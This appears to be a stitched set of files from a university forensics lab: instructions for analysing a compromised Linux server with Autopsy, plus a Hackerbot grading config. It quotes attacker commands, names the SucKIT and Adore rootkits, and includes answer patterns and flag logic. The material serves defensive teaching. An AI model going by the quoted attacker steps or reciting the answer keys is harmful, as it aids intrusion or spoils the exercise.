> [*http://whois.net/ip-address-lookup/*](http://whois.net/ip-address-lookup/)
>
> You may also run a traceroute to determine what routers lie between your system and the remote system.
>
> Additionally, software and websites exist that will graphically approximate the location of the IP:
>
> [*http://www.iplocationfinder.com/*](http://www.iplocationfinder.com/)
---
Within Autopsy, ==view the /var/log/boot.log file==. At the top of this file Syslog reports starting at August 10 at 13:33:57.
==LogBook Question: Given what we have learned about this system during timeline analysis, what is suspicious about Syslog restarting on August 10th? Was the system actually restarted at that time?==
Note that according to the log, Apache fails to restart. Why can't Apache restart? Do you think the attacker intended to do this?
==Open the mail log file==, which you recorded the location of earlier. ==Identify the email addresses that messages were sent to.==
---
Another valuable source of information are records of commands that have been run by users. One source of this information is the .bash\_history file. As noted during timeline analysis, the /root/.bash\_history file was symlinked to /dev/null, meaning the history was not saved. However, the attacker did leave behind a Bash history file in the root of the filesystem ("/"). ==View this file.==
Towards the end of this short Bash session the attacker downloads sslstop.tar.gz, then the attacker runs:
```bash
ps aux | grep apache
kill -9 21510 21511 23289 23292 23302
```
==LogBook Question: What is the attacker attempting to do with these commands?==
Apache has clearly played an important role in the activity of the attacker, so it is natural to investigate Apache's configuration and logs.
Still in Autopsy, ==browse to /etc/httpd/conf/, and view httpd.conf.==
Note that the Apache config has been altered by sslstop, by changing the "HAVE\_SSL" directive to "HAVE\_SSS" (remember, this file was shown in the timeline to be modified after sslstop was run)
This configuration also specifies that Apache logs are stored in /etc/httpd/logs, and upon investigation this location is symlinked to /var/log/httpd/. This is a common Apache configuration.
Unfortunately the /var/log/httpd/ directory does not exist, so clearly the attacker has attempted to cover their tracks by deleting Apache's log files.
## Deleted files analysis
Autopsy can be used to view files that have been deleted. Simply click "All Deleted Files", and browse through the deleted files it has discovered. Some of the deleted files will have known filenames, others will not.
However, this is not an efficient way of searching through content to find relevant information.
Since we are primarily interested in recovering lost log files (which are ASCII human-readable), one of the quickest methods is to extract all unallocated data from our evidence image, and search that for likely log messages. Autopsy has a keyword search. However, manual searching can be more efficient.
In a terminal console in Kali Linux, ==run:==
```bash
blkls -A evidence/hda1.img | strings > evidence/unallocated
```
This will extract all unallocated blocks from the partition, and run this through strings, which reduces it to text only (removing any binary data), and the results are stored in "evidence/unallocated".
Open the extracted information for viewing:
```bash
less evidence/unallocated
```
Scroll down, and ==find any deleted email message logs.==
> Hint: try pressing ":" then type "/To:".
==LogBook Question: What sorts of information was emailed?==
To get the list of all email recipients quit less (press 'q'), and ==run:==
```bash
grep "To:.*@" evidence/unallocated
```
Once again, ==open the extracted deleted information== for viewing:
```bash
less evidence/unallocated
```
Scroll down until you notice some Bash history. What files have been downloaded using wget? Quit less, and write a grep command to search for wget commands used to download files.
---
==Write a grep command to search for commands used by the attacker to delete files from the system.==
Once again, open the extracted deleted information for viewing:
```bash
less evidence/unallocated
```
Press ":" and type "/shellcode". There a quite a few exploits on this system, not all of which were used in the compromise.
==Search for the contents of log files==, that were recorded on the day the attack took place:
```bash
grep "Aug[/ ]10" evidence/unallocated
```
Note that there is an error message from Apache that repeats many times, complaining that it cannot hold a lockfile. This is caused by the attacker having deleted the logs directory, which Apache is using.
If things have gone extremely well the output will include further logs from Apache, including error messages with enough information to search the Internet for information about the exploit that was used to take control of Apache to run arbitrary code. If not, then at some point during live analysis you may have clobbered some deleted files. This is the important piece of information from unallocated disk space:
`
[Sun Aug 10 13:24:29 2003] [error] mod_ssl: SSL handshake failed (server localhost.localdomain:443, client 213.154.118.219) (OpenSSL library error follows)
[Sun Aug 10 13:24:29 2003] [error] OpenSSL: error:1406908F:SSL routines:GET_CLIENT_FINISHED:connection id is different
`
This may indicate the exploitation of this software vulnerability:
> OpenSSL SSLv2 Malformed Client Key Remote Buffer Overflow Vulnerability
>
> [*http://www.securityfocus.com/bid/5363*](http://www.securityfocus.com/bid/5363)
[^1]: Note that the specifics of the times that are recorded depend on the filesystem in use. A typical Unix filesystem keeps a record of the most recent modification, most recent access, and most recent inode change. On Windows filesystems a creation date may be recorded in place of the inode change date.
[^2]: [*http://wiki.sleuthkit.org/index.php?title=Mactime\_output*](http://wiki.sleuthkit.org/index.php?title=Mactime_output)

View File

@@ -0,0 +1,79 @@
## Deleted files analysis
Autopsy can be used to view files that have been deleted. Simply click "All Deleted Files", and browse through the deleted files it has discovered. Some of the deleted files will have known filenames, others will not.
However, this is not an efficient way of searching through content to find relevant information.
Since we are primarily interested in recovering lost log files (which are ASCII human-readable), one of the quickest methods is to extract all unallocated data from our evidence image, and search that for likely log messages. Autopsy has a keyword search. However, manual searching can be more efficient.
In a terminal console in Kali Linux, ==run:==
```bash
blkls -A evidence/hda1.img | strings > evidence/unallocated
```
This will extract all unallocated blocks from the partition, and run this through strings, which reduces it to text only (removing any binary data), and the results are stored in "evidence/unallocated".
Open the extracted information for viewing:
```bash
less evidence/unallocated
```
Scroll down, and ==find any deleted email message logs.==
> Hint: try pressing ":" then type "/To:".
==LogBook Question: What sorts of information was emailed?==
To get the list of all email recipients quit less (press 'q'), and ==run:==
```bash
grep "To:.*@" evidence/unallocated
```
Once again, ==open the extracted deleted information== for viewing:
```bash
less evidence/unallocated
```
Scroll down until you notice some Bash history. What files have been downloaded using wget? Quit less, and write a grep command to search for wget commands used to download files.
---
==Write a grep command to search for commands used by the attacker to delete files from the system.==
Once again, open the extracted deleted information for viewing:
```bash
less evidence/unallocated
```
Press ":" and type "/shellcode". There a quite a few exploits on this system, not all of which were used in the compromise.
==Search for the contents of log files==, that were recorded on the day the attack took place:
```bash
grep "Aug[/ ]10" evidence/unallocated
```
Note that there is an error message from Apache that repeats many times, complaining that it cannot hold a lockfile. This is caused by the attacker having deleted the logs directory, which Apache is using.
If things have gone extremely well the output will include further logs from Apache, including error messages with enough information to search the Internet for information about the exploit that was used to take control of Apache to run arbitrary code. If not, then at some point during live analysis you may have clobbered some deleted files. This is the important piece of information from unallocated disk space:
`
[Sun Aug 10 13:24:29 2003] [error] mod_ssl: SSL handshake failed (server localhost.localdomain:443, client 213.154.118.219) (OpenSSL library error follows)
[Sun Aug 10 13:24:29 2003] [error] OpenSSL: error:1406908F:SSL routines:GET_CLIENT_FINISHED:connection id is different
`
This may indicate the exploitation of this software vulnerability:
> OpenSSL SSLv2 Malformed Client Key Remote Buffer Overflow Vulnerability
>
> [*http://www.securityfocus.com/bid/5363*](http://www.securityfocus.com/bid/5363)
[^1]: Note that the specifics of the times that are recorded depend on the filesystem in use. A typical Unix filesystem keeps a record of the most recent modification, most recent access, and most recent inode change. On Windows filesystems a creation date may be recorded in place of the inode change date.
[^2]: [*http://wiki.sleuthkit.org/index.php?title=Mactime\_output*](http://wiki.sleuthkit.org/index.php?title=Mactime_output)

View File

@@ -0,0 +1,195 @@
# Analysis of a Compromised System - Part 2: Offline Analysis
## Getting started
> ###==**Note: You cannot complete this lab (part 2) without having saved the evidence you collected during part 1 of the lab.**==
### VMs in this lab
==Start these VMs== (if you haven't already):
- hackerbot-server (leave it running, you don't log into this)
- desktop (this week's)
- desktop (last week's desktop VM, to access your evidence)
- kali (user: root, password: toor)
All of these VMs need to be running to complete the lab.
## Introduction to dead (offline) analysis
Once you have collected information from a compromised computer (as you have done in the previous lab), you can continue analysis offline. There are a number of software environments that can be used do offline analysis. We will be using Kali Linux, which includes a number of forensic tools. Another popular toolset is the Helix incident response environment, which you may want to also experiment with.
This lab reinforces what you have learned about integrity management and log analysis, and introduces a number of new concepts and tools.
## Getting our data into the analysis environment
To start, we need to ==get the evidence that has been collected in the previous lab onto an analysis system== (copy to /root/evidence on the Kali VM) that has software for analysing the evidence.
If you still have your evidence stored on last week's desktop VM, you can transfer the evidence straight out of /home/*user* to the Kali Linux system using scp:
```bash
scp -r *username-from-that-system*@*ip-address*:evidence evidence
```
> **Note the IP addresses**: run /sbin/ifconfig on last week's Desktop VM, and also run ifconfig on the Kali VM. Make a note of the two IP addresses, which should be on the same subnet (starting the same).
## Mounting the image read-only
**On Kali Linux**:
It is possible to mount the partition image directly as a [*loop device*](http://en.wikipedia.org/wiki/Loop_device), and access the files directly. However, doing so should be done with caution (and is generally a bad idea, unless you are very careful), since there is some chance that it may result in changes to your evidence, and you risk infecting the analysis machine with any malware on the system being analysed. However, this technique is worth exploring, since it does make accessing files particularly convenient.
==Create a directory to mount our evidence onto:==
```bash
mkdir /mnt/compromised
```
==Mount the image== that we previously captured of the state of the main partition on the compromised system:
```bash
mount -O ro -o loop evidence/hda1.img /mnt/compromised
```
> Troubleshooting: If you used a VMware VM in the live analysis lab, you may need to replace hda1.img with sda1.img
Confirm that you can now see the files that were on the compromised system:
```bash
ls /mnt/compromised
```
## Preparing for analysis of the integrity of files
Fortunately the "system administrator" of the Red Hat server had run a file integrity tool to generate hashes before the system was compromised. Start by saving a copy of the hashes recorded of the system when it was in a clean state...
<a href="data:<%= File.read self.templates_path + 'md5sum-url-encoded' %>">Click here to download the md5 hashes of the system before it was compromised</a>
==Save the hashes in the evidence directory of the Kali VM, name the file "md5s".==
==View the file==, to confirm all went well:
```bash
less evidence/md5s
```
> 'q' to quit
As you have learned in the Integrity Management lab, this information can be used to check whether files have changed.
## Starting Autopsy
Autopsy is a front-end for the Sleuth Kit (TSK) collection of forensic analysis command line tools. There is a version of Autopsy included in Kali Linux (a newer desktop-based version is also available for Windows).
==Create a directory== for storing the evidence files from Autopsy:
```bash
mkdir /root/evidence/autopsy
```
Start Autopsy. You can do this using the program menu. ==Click Applications / Forensics / autopsy.==
A terminal window should be displayed.
==Open Firefox, and visit [http://localhost:9999/autopsy](http://localhost:9999/autopsy)==
==Click "New Case".==
==Enter a case name==, such as "RedHatCompromised", and ==a description==, such as "Compromised Linux server", and ==enter your name==. ==Click "New Case".==
==Click the "Add Host" button.==
In section "6. Path of Ignore Hash Database", ==enter /root/linux-suspended-md5s==
==Click the "Add Host" button== at the bottom of the page
==Click "Add Image".==
==Click "Add Image File".==
For section "1. Location", ==enter /root/evidence/hda1.img==
For "2. Type", ==select "Partition".==
For "3. Import Method", ==select "Symlink".==
==Click "Next".==
==Click "Add".==
==Click "Ok".==
## File type analysis and integrity checking
Now that you have started and configured Autopsy with a new case and hash database, you can view the categories of files, while ignoring files that you know to be safe.
==Click "Analyse".==
==Click "File Type".==
==Click "Sort Files by Type".==
Confirm that "Ignore files that are found in the Exclude Hash Database" is selected.
==Click "Ok"==, this analysis takes some time.
Once complete, ==view the "Results Summary".==
The output shows that over 16000 files have been ignored because they were found in the md5 hashes ("Hash Database Exclusions"). This is good news, since what it leaves us with are the interesting files that have changed or been created since the system was in a clean state. This includes archives, executables, and text files (amongst other categories).
==Click "View Sorted Files".==
Copy the results file location as reported by Autopsy, and ==open the report in a new tab within Firefox:==
> /var/lib/autopsy/RedHatCompromised/host1/output/sorter-vol1/index.html
==Click "compress"==, to view the compressed files. You are greeted with a list of two compressed file archives, "/etc/opt/psyBNC2.3.1.tar.gz", and "/root/sslstop.tar.gz".
==Figure out what `psyBNC2.3.1.tar.gz` is used for.==
> Try using Google, to search for the file name, or part thereof.
Browse the evidence in /mnt/compromised/etc/opt (on the Kali Linux system, using a file browser, such as Dolphin) and look at the contents of the archive (in /etc/opt, and you may find that the attacker has left an uncompressed version which you can assess in Autopsy). Remember, don't execute any files from the compromised system on your analysis machine: you don't want to end up infecting your analysis machine. For this reason, it is safer to assess these files via Autopsy. ==Browse to the directory by clicking back to the Results Summary tab of Autopsy, and clicking "File Analysis"==, then browse to the files from there (in /etc/opt). Read the psyBNC README file, and ==note what this software package is used for.==
> **Help: if the README file did not display as expected,** click on the inode (meta) number at the right-hand side of the line containing the README file. You will need to click each direct block link in turn to see the content of the README file. The direct block links are displayed at the bottom left-hand side of the webpage.
Next, we investigate what sslstop.tar.gz is used for. A quick Google brings up a CGSecurity.org page, which reports that this script modifies httpd.conf to disable SSL support from Apache. Interesting... Why would an attacker want to disable SSL support? This should soon become clear.
==Return the page where "compress" was accessed== (/root/evidence/autopsy/RedHatCompromised/host1/output/sorter-vol1/index.html), and ==click "exec"==. This page lists a fairly extensive collection of new executables on our compromised server.
==Make a list of all the executables that are likely trojanized.==
> Hint: for now ignore the "relocatable" objects left from compiling the PSYBNC software, and focus on "executable" files, especially those in /bin/ and /usr/bin/.
---
Refer to your previously collected evidence to ==identify whether any of the new executables were those with open ports== when live information was collected. Two of these have particularly interesting file names: `/usr/bin/smbd -D` and `/usr/bin/(swapd)`. These names are designed to be deceptive: for example, the inclusion of ` -D` is designed to trick system administrators into thinking that any processes were started with the "-D" command line argument flag.
Note that /lib/.x/ contains a number of new executables, including one called "hide". These are likely part of a rootkit.
> **Hint:** to view these files you will have to look in /mnt/compromised/lib/.x. The .x folder is a hidden folder (all folders and file in Linux that begin with a "." ar hidden files). Therefore, you will have to use the -a switch when using the ls command in a terminal or tell the graphical file manager to display hidden files ( View &gt; Show Hidden Files or Ctrl+H).
==Using Autopsy "File Analysis" mode, browse to "/lib/.x/"==. **Explicit language warning: if you are easily offended, then skip this next step.** View the contents of "install.log".
> **Hint:** you will have to click **../** to move up the directory tree until you can see the lib directory in the root directory /.
> **Help: if the install.log file did not display as expected,** click on the inode (meta) number at the right-hand side of the line containing the README file. You will need to click the direct block link to see the content of the install.log file. The direct block links are displayed at the bottom left-hand side of the webpage.
This includes the lines:
> \#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#
> \# SucKIT version 1.3b by Unseen &lt; unseen@broken.org &gt; \#
> \#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#
SuckIT is a rootkit that tampers with the Linux kernel directly via /dev/kmem, rather than the usual approach of loading a loadable kernel module (LKM). The lines in the log may indicate that the rootkit had troubles loading.
SuckIT and the rootkit technique is described in detail in Phrack issue 58, article 0x07 "Linux on-the-fly kernel patching without LKM"
> [*http://www.textfiles.com/magazines/PHRACK/PHRACK58*](http://www.textfiles.com/magazines/PHRACK/PHRACK58)
==Using Autopsy "File Analysis", view the file /lib/.x/.boot==
> **Help:** again you may need to view the block directly that contains the .boot file. Make a note of the file's access times, this will come in handy soon.
This shell script starts an SSH server (s/xopen), and sends an email to a specific email address to inform them that the machine is available. View the script, and ==determine what email address it will email the information to.==
Return to the file type analysis (presumably still open in an Iceweasel tab), still viewing the "exec" category, also note the presence of "adore.o". Adore is another rootkit (and worm), this one loads via an LKM (loadable kernel module).
Here is a concise description of a version of Adore:
> [*http://lwn.net/Articles/75990/*](http://lwn.net/Articles/75990/)
This system is well and truly compromised, with multiple kernel rootkits installed, and various trojanized binaries.

View File

@@ -0,0 +1,242 @@
<%
require 'json'
require 'securerandom'
require 'digest/sha1'
require 'fileutils'
require 'erb'
if self.accounts.empty?
abort('Sorry, you need to provide an account')
end
$first_account = JSON.parse(self.accounts.first)
$second_account = JSON.parse(self.accounts[1])
$files = []
$log_files = []
if $second_account.key?("leaked_filenames") && $second_account['leaked_filenames'].size > 0
$files = $second_account['leaked_filenames']
$log_files = $second_account['leaked_filenames'].grep(/log/)
end
if $files.empty?
$files = ['myfile', 'afile', 'filee', 'thefile']
end
if $log_files.empty?
$log_files = ['log', 'thelog', 'logs', 'frogonalog']
end
$main_user = $first_account['username'].to_s
$main_user_pass = $first_account['password'].to_s
$second_user = $second_account['username'].to_s
$example_file = "/home/#{$second_user}/#{$files.sample}"
$example_dir = "/home/#{$second_user}/personal_secrets/"
$web_server_ip = self.web_server_ip.first
$ids_server_ip = self.ids_server_ip.first
$hackerbot_server_ip = self.hackerbot_server_ip.first
$root_password = self.root_password
$flags = self.flags
REQUIRED_FLAGS = 8
while $flags.length < REQUIRED_FLAGS
$flags << "flag{#{SecureRandom.hex}}"
Print.err "Warning: Not enough flags provided to hackerbot_config generator, some flags won't be tracked/marked!"
end
def get_binding
binding
end
%>
<?xml version="1.0"?>
<hackerbot
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.github/cliffe/SecGen/hackerbot">
<!--<hackerbot xmlns="http://www.github/cliffe/SecGen/hackerbotz"-->
<name>Hackerbot</name>
<AIML_chatbot_rules>config/AIML</AIML_chatbot_rules>
<!--Method for gaining shell access, can be overwritten per-attack-->
<!--<get_shell>bash</get_shell>-->
<get_shell>false</get_shell>
<messages>
<show_attack_numbers />
<greeting>Hi there. It seems we have a server that's been compromised. Investigate for me, and I'll give you some flags.</greeting>
<!--Must provide alternatives for each message-->
<say_ready>When you are ready, simply say 'ready'.</say_ready>
<say_ready>'Ready'?</say_ready>
<next>Ok, I'll do what I can to move things along...</next>
<next>Moving things along to the next one...</next>
<previous>Ok, I'll do what I can to back things up...</previous>
<previous>Ok, backing up.</previous>
<goto>Ok, skipping it along.</goto>
<goto>Let me see what I can do to goto that attack.</goto>
<last_attack>That was the last one for now. You can rest easy, until next time... (End.)</last_attack>
<last_attack>That was the last one. Game over?</last_attack>
<first_attack>You are back to the beginning!</first_attack>
<first_attack>This is where it all began.</first_attack>
<getting_shell>Doing my thing...</getting_shell>
<getting_shell>Here we go...</getting_shell>
<got_shell>...</got_shell>
<got_shell>....</got_shell>
<repeat>Let me know when you are 'ready', if you want to move on say 'next', or 'previous' and I'll move things along.</repeat>
<repeat>Say 'ready', 'next', or 'previous'.</repeat>
<!--Single responses:-->
<help>I am waiting for you to say 'ready', 'next', 'previous', 'list', 'goto *X*', or 'answer *X*'</help>
<say_answer>Say "The answer is *X*".</say_answer>
<no_quiz>There is no question to answer</no_quiz>
<correct_answer>Correct</correct_answer>
<incorrect_answer>Incorrect</incorrect_answer>
<invalid>That's not possible.</invalid>
<non_answer>Wouldn't you like to know.</non_answer>
<!--can be overwritten per-attack-->
<shell_fail_message>Oh no. Failed to get shell... You need to let us in.</shell_fail_message>
</messages>
<tutorial_info>
<title>Live Analysis</title>
<tutorial><%= ERB.new(File.read self.templates_path + 'intro.md.erb').result(self.get_binding) %></tutorial>
<footer>
<%= File.read self.templates_path + 'resources.md.erb' %>
<%= File.read self.templates_path + 'license.md.erb' %>
Randomised instance generated by [SecGen](http://github.com/cliffe/SecGen) (<%= Time.new.to_s %>)
</footer>
<provide_tutorial>true</provide_tutorial>
</tutorial_info>
<attack>
<% $rand_name1 = SecureRandom.hex(3)
$flag1 = $flags.pop
$flag2 = $flags.pop
%>
<pre_shell>sshpass -p <%= $root_password %> scp -prv -oStrictHostKeyChecking=no root@{{chat_ip_address}}:/home/<%= $main_user %>/evidence/<%= $rand_name1 %> /tmp/susp_trojans; echo $?; cat /tmp/susp_trojans | sort</pre_shell>
<get_shell>false</get_shell>
<prompt>Create a list of the potentially trojanised executables on the compromised system, save to your Desktop VM in /home/<%= $main_user %>/evidence/<%= $rand_name1 %>. Use full pathnames, one per line.</prompt>
<condition>
<output_matches>/lib/.x/|/root/sslstop/</output_matches>
<message>:( Only include the programs that are typically found on a Linux system, but that seem to have been replaced with Trojans horses.</message>
<trigger_next_attack />
</condition>
<condition>
<output_matches>/bin/ls.*/bin/netstat.*/bin/ps.*/sbin/ifconfig.*/usr/bin/top</output_matches>
<message>:-D Well done! Two flags for you! <%= $flag1 %>, <%= $flag2 %>.</message>
<trigger_next_attack />
</condition>
<condition>
<output_matches>/bin/ls|/bin/netstat|/bin/ps|/sbin/ifconfig|/usr/bin/top</output_matches>
<message>:) Well done! <%= $flag1 %>. You have some but not all. There are more flags to be had, by including more.</message>
<trigger_quiz />
</condition>
<condition>
<output_matches>1</output_matches>
<message>:( Failed to get the file.</message>
</condition>
<else_condition>
<message>:( List is incomplete...</message>
</else_condition>
<tutorial><%= ERB.new(File.read self.templates_path + 'timeline.md.erb').result(self.get_binding) %></tutorial>
</attack>
<attack>
<% $rand_name2 = SecureRandom.hex(3) %>
<pre_shell>sshpass -p <%= $root_password %> scp -prv -oStrictHostKeyChecking=no root@{{chat_ip_address}}:/home/<%= $main_user %>/evidence/<%= $rand_name2 %> /tmp/susp_pids; echo --$?; cat /tmp/susp_pids</pre_shell>
<get_shell>false</get_shell>
<prompt>Create a list of IP addresses you beleive have attempted to log in to the system using SSH or Telnet. Save to your Desktop VM in /home/<%= $main_user %>/evidence/<%= $rand_name2 %>.</prompt>
<condition>
<output_matches>202.85.165.45|192.109.122.5</output_matches>
<message>:) Well done! <%= $flags.pop %>.</message>
<trigger_quiz />
</condition>
<condition>
<output_matches>--1</output_matches>
<message>:( Failed to get file.</message>
</condition>
<else_condition>
<message>:( List is incomplete...</message>
</else_condition>
<% $questions = {'What is the approximate longitude of the IP addresses that have attempted to log in to the system using SSH or Telnet?'=>'4\.|114\.','What countries are the IP addresses that have attempted to log in to the system using SSH or Telnet'=>'Hong Kong|Netherlands'}
$rand_question1 = $questions.keys.sample %>
<quiz>
<question><%= $rand_question1 %></question>
<answer><%= $questions[$rand_question1] %></answer>
<correct_answer_response>:) <%= $flags.pop %></correct_answer_response>
<trigger_next_attack />
</quiz>
</attack>
<attack>
<% $rand_name3 = SecureRandom.hex(3) %>
<pre_shell>sshpass -p <%= $root_password %> scp -prv -oStrictHostKeyChecking=no root@{{chat_ip_address}}:/home/<%= $main_user %>/evidence/<%= $rand_name3 %> /tmp/susp_email; echo $?; cat /tmp/susp_email</pre_shell>
<get_shell>false</get_shell>
<prompt>Save the email addresses that messages were sent to. Save to your Desktop VM in /home/<%= $main_user %>/evidence/<%= $rand_name3 %>.</prompt>
<condition>
<output_matches>newtraceuser@yahoo.com|skiZophrenia_siCk@yahoo.com|jijeljijel@yahoo.com</output_matches>
<message>:) Well done! <%= $flags.pop %>.</message>
<trigger_next_attack />
</condition>
<condition>
<output_matches>1</output_matches>
<message>:( Failed to get the file.</message>
</condition>
<else_condition>
<message>:( Something was not right...</message>
</else_condition>
<tutorial><%= ERB.new(File.read self.templates_path + 'logs.md.erb').result(self.get_binding) %></tutorial>
</attack>
<attack>
<% $rand_name4 = SecureRandom.hex(3) %>
<pre_shell>sshpass -p <%= $root_password %> scp -prv -oStrictHostKeyChecking=no root@{{chat_ip_address}}:/home/<%= $main_user %>/evidence/<%= $rand_name4 %> /tmp/susp_wget; echo $?; cat /tmp/susp_wget</pre_shell>
<get_shell>false</get_shell>
<prompt>Save the wget commands used to download rootkits. Save to your Desktop VM in /home/<%= $main_user %>/evidence/<%= $rand_name4 %>.</prompt>
<condition>
<output_matches>wget geocities.com</output_matches>
<message>:) Well done! <%= $flags.pop %>.</message>
<trigger_quiz />
</condition>
<condition>
<output_matches>1</output_matches>
<message>:( Failed to get the file.</message>
</condition>
<else_condition>
<message>:( List is incomplete...</message>
</else_condition>
<quiz>
<question>What country is the attacker likely from?</question>
<answer>Romania</answer>
<correct_answer_response>:) <%= $flags.pop %></correct_answer_response>
<trigger_next_attack />
</quiz>
<tutorial><%= ERB.new(File.read self.templates_path + 'deleted.md.erb').result(self.get_binding) %></tutorial>
</attack>
</hackerbot>

View File

@@ -0,0 +1,121 @@
<html>
<head>
<title><%= self.title %></title>
</head>
<body>
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="css/github-markdown.css">
<style>
.markdown-body {
box-sizing: border-box;
min-width: 200px;
max-width: 980px;
margin: 0 auto;
padding: 45px;
}
.markdown-body h4[id^='hackerbot']:after {
display: inline-block;
float: right;
content: url("images/skullandusb.svg");
width: 30px;
}
article {
float: right;
width: calc(100% - 300px);
}
.toc {
float: left;
font-size: smaller;
color: #1a1d22;
width: 300px;
position: fixed;
height: calc(100% - 56px);
overflow-y: scroll;
font-family: sans-serif;
margin-top: 50px;
}
.toc ul {
list-style-type: none;
padding: 0;
margin-left: 1em;
}
.toc li { /* Space between menu items*/
margin: 1em 0;
}
.toc a {
color: #1a1d22;
text-decoration: none;
}
.toc a:hover {
color: #6c036d;
text-decoration: none;
}
.toc a:visited {
color: #1a1d22;
text-decoration: none;
}
.markdown-body pre {
background-color: #570138;
color: whitesmoke;
}
.markdown-body p code span {
color: black !important;
}
.markdown-body p code {
background-color: whitesmoke;
border: 1px solid #eaecef;
}
.markdown-body img[alt="small-left"] {
max-width: 100px;
float: left;
}
.markdown-body img[alt="small-right"] {
max-width: 100px;
float: right;
}
.markdown-body img[alt="tiny-right"] {
max-width: 30px;
float: right;
}
.markdown-body img[alt="small"] {
max-width: 100px;
display: block;
margin-left: auto;
margin-right: auto;
padding: 15px;
}
mark {
background-color: white;
color: #5b29bd;
font-weight: bolder;
}
@media (max-width: 767px) {
.markdown-body {
padding: 15px;
min-width: 200px;
max-width: 980px;
}
.toc {
float: none;
width: 100%;
position: relative;
overflow: auto;
height: auto;
}
article {
float: none;
width: 100%;
}
}
</style>
<div class="toc">
<%= self.html_TOC_rendered %>
</div>
<article class="markdown-body">
<%= self.html_rendered %>
</article>
<script src="js/code-prettify/loader/run_prettify.js?autoload=true&amp;skin=sunburst&amp;lang=css"></script>
</body>
</html>

View File

@@ -0,0 +1,6 @@
## License
This lab by [*Z. Cliffe Schreuders*](http://z.cliffe.schreuders.org) at Leeds Beckett University is licensed under a [*Creative Commons Attribution-ShareAlike 3.0 Unported License*](http://creativecommons.org/licenses/by-sa/3.0/deed.en_GB).
Included software source code is also licensed under the GNU General Public License, either version 3 of the License, or (at your option) any later version.
![small](images/leedsbeckett-logo.png)

View File

@@ -0,0 +1,69 @@
## Logs analysis
As you learned in the Log Management topic, the most common logging system on Unix systems is Syslog, which is typically configured in /etc/syslog.conf (or similar, such as rsyslog). Within the Autopsy File Analysis browser, ==navigate to this configuration file and view its contents.== Note that most logging is configured to go to /var/log/messages. Some security messages are logged to /var/log/secure. Boot messages are logged to /var/log/boot.log.
==Make a note of where mail messages are logged==, you will use this later:
Within Autopsy, browse to /var/log. Note that you cannot view the messages file, which would have contained many helpful log entries. Click the inode number to the right (47173):
As previously seen in the timeline, this file has been symlinked to /dev/null. If you are not familiar with /dev/null, search the Internet for an explanation.
For now, we will continue by investigating the files that are available, and later investigate deleted files.
Using Autopsy, ==view the /var/log/secure file==, and identify any IP addresses that have attempted to log in to the system using SSH or Telnet.
==Determine the country of origin for each of these connection attempts:==
> On a typical Unix system we can look up this information using the command:
```bash
whois *IP-address*
```
> (Where IP-address is the IP address being investigated).
>
> However, this may not be possible from within our lab environment, and alternatively there are a number of websites that be used (potentially from your own host PC):
>
> [*http://whois.domaintools.com/*](http://whois.domaintools.com/)
>
> [*http://whois.net/ip-address-lookup/*](http://whois.net/ip-address-lookup/)
>
> You may also run a traceroute to determine what routers lie between your system and the remote system.
>
> Additionally, software and websites exist that will graphically approximate the location of the IP:
>
> [*http://www.iplocationfinder.com/*](http://www.iplocationfinder.com/)
---
Within Autopsy, ==view the /var/log/boot.log file==. At the top of this file Syslog reports starting at August 10 at 13:33:57.
==LogBook Question: Given what we have learned about this system during timeline analysis, what is suspicious about Syslog restarting on August 10th? Was the system actually restarted at that time?==
Note that according to the log, Apache fails to restart. Why can't Apache restart? Do you think the attacker intended to do this?
==Open the mail log file==, which you recorded the location of earlier. ==Identify the email addresses that messages were sent to.==
---
Another valuable source of information are records of commands that have been run by users. One source of this information is the .bash\_history file. As noted during timeline analysis, the /root/.bash\_history file was symlinked to /dev/null, meaning the history was not saved. However, the attacker did leave behind a Bash history file in the root of the filesystem ("/"). ==View this file.==
Towards the end of this short Bash session the attacker downloads sslstop.tar.gz, then the attacker runs:
```bash
ps aux | grep apache
kill -9 21510 21511 23289 23292 23302
```
==LogBook Question: What is the attacker attempting to do with these commands?==
Apache has clearly played an important role in the activity of the attacker, so it is natural to investigate Apache's configuration and logs.
Still in Autopsy, ==browse to /etc/httpd/conf/, and view httpd.conf.==
Note that the Apache config has been altered by sslstop, by changing the "HAVE\_SSL" directive to "HAVE\_SSS" (remember, this file was shown in the timeline to be modified after sslstop was run)
This configuration also specifies that Apache logs are stored in /etc/httpd/logs, and upon investigation this location is symlinked to /var/log/httpd/. This is a common Apache configuration.
Unfortunately the /var/log/httpd/ directory does not exist, so clearly the attacker has attempted to cover their tracks by deleting Apache's log files.

File diff suppressed because one or more lines are too long

View File

@@ -0,0 +1,62 @@
### Timeline analysis
It helps to reconstruct the timeline of events on the system, to get a better understanding. Software such as Sluthkit (either using the Autopsy frontend or the mactime command line tool) analyses the MAC times of files (that is, the most recent modification, most recent access, and most recent inode change[^1]) to reconstruct a sequence of file access events.
In another Firefox tab, ==visit [*http://localhost:9999/autopsy*](http://localhost:9999/autopsy), click "Open Case", "Ok", "Ok".==
==Click "File Activity Timelines".==
==Click "Create Data File".==
==Select "/1/ hda1.img-0-0 ext".==
==Click "Ok".==
==Click "Ok".==
For "5. Select the UNIX image that contains the /etc/passwd and /etc/group files", ==select "hda1.img-0-0".==
Wait while a timeline is generated.
==Click "Ok".==
Once analysis is complete, the timeline is presented. Note that the timeline starts with files accessed on Jan 01 1970.
==Click "Summary".==
A number of files are specified as accessed on Jan 01 1970. What is special about this date?
==Browse through the history.== Note that it is very detailed, and it is easy to get lost (and waste time) in irrelevant detail.
The access date you previously recorded (for "/lib/.x/.boot") was in August 2003, so this is probably a good place to start.
==Browse to August 2003 on the timeline==, and follow along:
Note that on the 6th of August it seems many files were accessed, and not altered (displayed as ".a.."[^2]). This is probably the point at which the md5 hashes of all the files on the system were collected.
On 9th August a number of config files were accessed including "/sbin/runlevel", "/sbin/ipchains", and "/bin/login". This indicates that the system was likely rebooted at this time.
On 10th August, a number of files that have since been deleted were accessed.
Shortly thereafter the inode data was changed (displayed as "..c.") for many files. Then many files owned by the *apache* user were last modified before they were deleted. The apache user goes on to access some more files, and then a number of header files (.h) were accessed, presumably in order to compile a C program from source. Directly after, some files were created, including "/usr/lib/adore", the Adore rootkit.
